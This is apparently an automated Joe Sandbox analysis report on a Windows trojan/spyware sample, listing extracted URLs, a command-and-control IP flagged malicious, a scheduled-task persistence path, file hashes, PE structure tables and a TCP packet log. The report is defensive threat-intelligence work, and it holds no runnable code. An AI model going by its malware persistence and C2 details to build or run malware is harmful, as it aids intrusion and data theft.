https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	tmp4887.tmp.21.dr, tmp4825.tmp.21.dr, tmp7F38.tmp.21.dr, tmp10D6.tmp.21.dr, tmp989A.tmp.14.dr, tmp10A5.tmp.21.dr, tmp4836.tmp.21.dr, tmp6270.tmp.14.dr, tmp98BA.tmp.14.dr, tmp4876.tmp.21.dr, tmp6291.tmp.14.dr, tmp4856.tmp.21.dr, tmp6280.tmp.14.dr, tmp9889.tmp.14.dr, tmp624F.tmp.14.dr, tmp1107.tmp.21.dr, tmp10C5.tmp.21.dr, tmp9838.tmp.14.dr, tmp9858.tmp.14.dr, tmp10F6.tmp.21.dr, tmp623F.tmp.14.dr	false	URL Reputation: safe	unknown
http://tempuri.org/Endpoint/EnvironmentSettingsResponse	PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/VerifyUpdate	PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/0	PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	PO.exe, 00000007.00000002.2160002789.0000000002A55000.00000004.00000800.00020000.00000000.sdmp, PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000010.00000002.2245706074.0000000003018000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	tmp4887.tmp.21.dr, tmp4825.tmp.21.dr, tmp7F38.tmp.21.dr, tmp10D6.tmp.21.dr, tmp989A.tmp.14.dr, tmp10A5.tmp.21.dr, tmp4836.tmp.21.dr, tmp6270.tmp.14.dr, tmp98BA.tmp.14.dr, tmp4876.tmp.21.dr, tmp6291.tmp.14.dr, tmp4856.tmp.21.dr, tmp6280.tmp.14.dr, tmp9889.tmp.14.dr, tmp624F.tmp.14.dr, tmp1107.tmp.21.dr, tmp10C5.tmp.21.dr, tmp9838.tmp.14.dr, tmp9858.tmp.14.dr, tmp10F6.tmp.21.dr, tmp623F.tmp.14.dr	false	URL Reputation: safe	unknown
http://45.137.22.67:55615t-	AJzHYZtQIb.exe, 00000015.00000002.2357626482.00000000030A3000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/soap/actor/next	PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.aforgenet.com/framework/	PO.exe	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
45.137.22.67	unknown	Netherlands		51447	ROOTLAYERNETNL	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1457840
Start date and time:	2024-06-15 20:21:09 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 46s
Hypervisor based Inspection enabled:	false
Report type:	light
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	w4XFffGDz1.exe renamed because original name is a hash value
Original Sample Name:	2185ecde5380054ad075b7a25ae0ea51.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@22/104@2/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, Microsoft.Photos.exe, SIHClient.exe, svchost.exe
TCP Packets have been reduced to 100
Created / dropped Files have been reduced to 100
Excluded IPs from analysis (whitelisted): 104.26.12.31, 104.26.13.31, 172.67.75.172
Excluded domains from analysis (whitelisted): api.ip.sb.cdn.cloudflare.net, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
14:22:03	API Interceptor	34x Sleep call for process: PO.exe modified
14:22:09	API Interceptor	37x Sleep call for process: powershell.exe modified
14:22:13	API Interceptor	45x Sleep call for process: AJzHYZtQIb.exe modified
14:22:13	API Interceptor	1x Sleep call for process: w4XFffGDz1.exe modified
20:22:11	Task Scheduler	Run new task: AJzHYZtQIb path: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe

Process:	C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	2232
Entropy (8bit):	5.379552885213346
Encrypted:	false
SSDEEP:	48:fWSU4xympjgZ9tz4RIoUl8NPZHUl7u1iMugeC/ZM0Uyus:fLHxvCZfIfSKRHmOugw1s
MD5:	236CE6553B5DB20FA0B07F9FEA88F4A4
SHA1:	AEB5B156162EC5CD4E0BC3A0BA0F0D4739D40DBD
SHA-256:	3849E9437770B9804D942D293FFAB3C6449B82BA23C0CD3D48DE2C318938FCAD
SHA-512:	90B07AFD72EE353BEA8E2C7ECBB8CDAFB965C91E1B32C5FFE971F60C69004FDEBF5BA429B4DD455210772D2494A8AD60930A8F01C289D0199998A7CC36050FD6
Malicious:	false
Preview:	@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

Process:	C:\Users\user\Desktop\w4XFffGDz1.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	743944
Entropy (8bit):	7.615457036874597
Encrypted:	false
SSDEEP:	12288:Sxtg61jjk0LAta9A15fraDI+Jpaf6F+CfdGoZ8LFCSz4vtwD/zxmkR:wg61jjk0LAta9A+DIMaf6MCF18LXz
MD5:	86F98523CEB67DF5CC3431A839F63134
SHA1:	160A60824E1ADC4C0FFD5959341C6DAE4DA2E76B
SHA-256:	0E43D560502493DFADE28C5822081232EE47FD42C233F9FF473C467E51297E27
SHA-512:	CD6D79DBF6E8EC3663570F584760DB9AC50E190B4CC6E12630CB31796A88912B26556B08E01E803D3EC06874263FBDEB9AC73C8C5CD67E2749D32EBA7A23C7B7
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 88% Antivirus: Virustotal, Detection: 58%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...'.gf..............0..............#... ...@....@.. ....................................@.................................."..O....@..L............$...6...`....................................................... ............... ..H............text........ ...................... ..`.rsrc...L....@......................@..@.reloc.......`......."..............@..B................."......H.......P...."..........P...p+...........................................0..\........(.....(.....{....r...po.....{....r...p(.......(.......(....rC..p(....o.....{....r...po....br...p( ...&.{.....o!.....("...z.,..{....,..{....o#.....($....0...........s%...}.....s&...}.....s'...}.....s(...}.....s%...}.....{....o)....(*....{.....o+....{....r-..p"..@A.. ....s,...o-....{.... ......s....o/....{....r?..po0....{.....9..s1...o2....{.....o3....{....rU..po.....{.....o+....{....r-..p"

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.781604734274106
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	w4XFffGDz1.exe
File size:	920'266 bytes
MD5:	2185ecde5380054ad075b7a25ae0ea51
SHA1:	caa1b832574fc3050af5f97b6deabc21398b5c47
SHA256:	e1a01751d2ea4682e211983eb7d6d1f01876a1199ba8eb9f04e3b8594f2ee199
SHA512:	f31d6c4fc0b4533c0538975518a1ff703c9a62ffdb072570942245725d375b9ef27f0d65a37e3ed07cd52a11def9893c8c3e7d0edc884c5c9b602af61ad8e211
SSDEEP:	24576:bCdL4E+j8SmRREbtuLD4DIvu18fplg+zQWxu5y0:bcL4/ruqbtuLMDQh58
TLSH:	6E15122277D58832C2F322371975A3925A3CB8715F238ACB93E429ADEF359C19931753
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............y...y...y....~..y....\|.!y....}..y..+.r..y..+....y..+....y..+....y.......y.......y...y...x..%....y..%....y..%.p..y..%....y.

Entrypoint:	0x41d000
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x65DC537F [Mon Feb 26 09:01:51 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	10b73c5f7fc148e21f974da703236659

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x3cef0	0x34	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3cf24	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x5d000	0x62f8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x64000	0x2f38	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3a020	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x3a080	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x346f8	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x32000	0x24c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x3c4fc	0x100	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x3023c	0x30400	eab8c49347b2363b3fdd36257b1df951	False	0.5767132852979274	data	6.682129404058095	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x32000	0xbc34	0xbe00	e5f2fdc4aee2f1a0726781d86b4f8c02	False	0.4407483552631579	data	5.126576177856284	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3e000	0x1df78	0x1200	94ebd057e10782ee3aa0d3ba58c1a1bf	False	0.3856336805555556	DOS executable (block device driver w{\362ko\3050)	3.9129841433728263	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat	0x5c000	0x17c	0x200	f6f8a7d940bc508fbb3b807359e5a063	False	0.42578125	data	3.261134286324671	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x5d000	0x62f8	0x6400	274f8184ed0865c3a4e3309a06e7038d	False	0.6695703125	data	6.732052947212191	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x64000	0x2f38	0x3000	83735fea8ebd9a3faee82aa0e6812001	False	0.7744140625	data	6.687384285279319	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
PNG	0x5d554	0xb45	PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced	English	United States	1.0027729636048528
PNG	0x5e09c	0x15a9	PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced	English	United States	0.9363390441839495
RT_ICON	0x5f648	0x162c	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced			0.906800563777308
RT_DIALOG	0x60c74	0x286	data	English	United States	0.5092879256965944
RT_DIALOG	0x60efc	0x13a	data	English	United States	0.60828025477707
RT_DIALOG	0x61038	0xec	data	English	United States	0.6991525423728814
RT_DIALOG	0x61124	0x12e	data	English	United States	0.5927152317880795
RT_DIALOG	0x61254	0x338	data	English	United States	0.45145631067961167
RT_DIALOG	0x6158c	0x252	data	English	United States	0.5757575757575758
RT_STRING	0x617e0	0x1e2	data	English	United States	0.3900414937759336
RT_STRING	0x619c4	0x1cc	data	English	United States	0.4282608695652174
RT_STRING	0x61b90	0x1b8	data	English	United States	0.45681818181818185
RT_STRING	0x61d48	0x146	data	English	United States	0.5153374233128835
RT_STRING	0x61e90	0x46c	data	English	United States	0.3454063604240283
RT_STRING	0x622fc	0x166	data	English	United States	0.49162011173184356
RT_STRING	0x62464	0x152	data	English	United States	0.5059171597633136
RT_STRING	0x625b8	0x10a	data	English	United States	0.49624060150375937
RT_STRING	0x626c4	0xbc	data	English	United States	0.6329787234042553
RT_STRING	0x62780	0x1c0	data	English	United States	0.5178571428571429
RT_STRING	0x62940	0x250	data	English	United States	0.44256756756756754
RT_GROUP_ICON	0x62b90	0x14	data			1.05
RT_MANIFEST	0x62ba4	0x753	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.3957333333333333

DLL	Import
KERNEL32.dll	LocalFree, GetLastError, SetLastError, FormatMessageW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileTime, CloseHandle, CreateFileW, GetCurrentProcessId, CreateDirectoryW, RemoveDirectoryW, SetFileAttributesW, GetFileAttributesW, DeleteFileW, MoveFileW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetModuleFileNameW, SetCurrentDirectoryW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, ExpandEnvironmentStringsW, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, GetTimeFormatW, GetDateFormatW, GetCurrentProcess, GetExitCodeProcess, WaitForSingleObject, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetNumberFormatW, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapReAlloc, HeapSize, SetStdHandle, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, SetEvent, ResetEvent, WaitForSingleObjectEx, CreateEventW, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
OLEAUT32.dll	VariantClear, SysFreeString, SysAllocString
gdiplus.dll	GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdiplusShutdown, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 15, 2024 20:22:13.592211962 CEST	49710	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:13.597270966 CEST	55615	49710	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:13.597446918 CEST	49710	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:13.614931107 CEST	49710	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:13.619968891 CEST	55615	49710	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:13.962301016 CEST	49710	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:13.968107939 CEST	55615	49710	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:14.436089039 CEST	55615	49710	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:14.477663040 CEST	49710	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:19.484477043 CEST	49710	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:19.484569073 CEST	49710	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:19.489763975 CEST	55615	49710	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:19.489794970 CEST	55615	49710	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:19.746203899 CEST	55615	49710	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:19.746267080 CEST	55615	49710	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:19.746320963 CEST	55615	49710	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:19.746330023 CEST	49710	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:19.746356964 CEST	55615	49710	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:19.746387005 CEST	55615	49710	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:19.746412992 CEST	49710	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:19.790283918 CEST	49710	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:20.549530029 CEST	49718	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:20.554758072 CEST	55615	49718	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:20.554884911 CEST	49718	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:20.564523935 CEST	49718	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:20.569586039 CEST	55615	49718	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:20.915374994 CEST	49718	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:20.920666933 CEST	55615	49718	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:21.384052038 CEST	55615	49718	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:21.430783987 CEST	49718	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:22.916909933 CEST	49710	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:22.917320013 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:22.922207117 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:22.922521114 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:22.922700882 CEST	55615	49710	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:22.922755003 CEST	49710	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:22.923113108 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:22.923113108 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:22.928051949 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:22.928081989 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:22.928103924 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:22.928132057 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:22.928152084 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:22.928159952 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:22.928189039 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:22.928208113 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:22.928220987 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:22.928252935 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:22.928339005 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:22.928366899 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:22.928416967 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:22.932372093 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:22.932456970 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:22.932457924 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:22.932507992 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:22.933129072 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:22.933177948 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:22.933181047 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:22.933207989 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:22.933255911 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:22.933264017 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:22.933284998 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:22.933314085 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:22.933339119 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:22.933495045 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:22.974293947 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:22.974421024 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.022219896 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.022274017 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.070172071 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.070229053 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.118232965 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.118518114 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.166363001 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.166462898 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.214201927 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.220511913 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.270370960 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.270559072 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.318248034 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.318428040 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.366364002 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.366983891 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.418523073 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.418622017 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.466478109 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.466589928 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.518975973 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.519157887 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.524339914 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.524373055 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.524425983 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.524440050 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.524468899 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.524559021 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.524575949 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:23.524626970 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.524658918 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:23.524687052 CEST	55615	49720	45.137.22.67	192.168.2.5
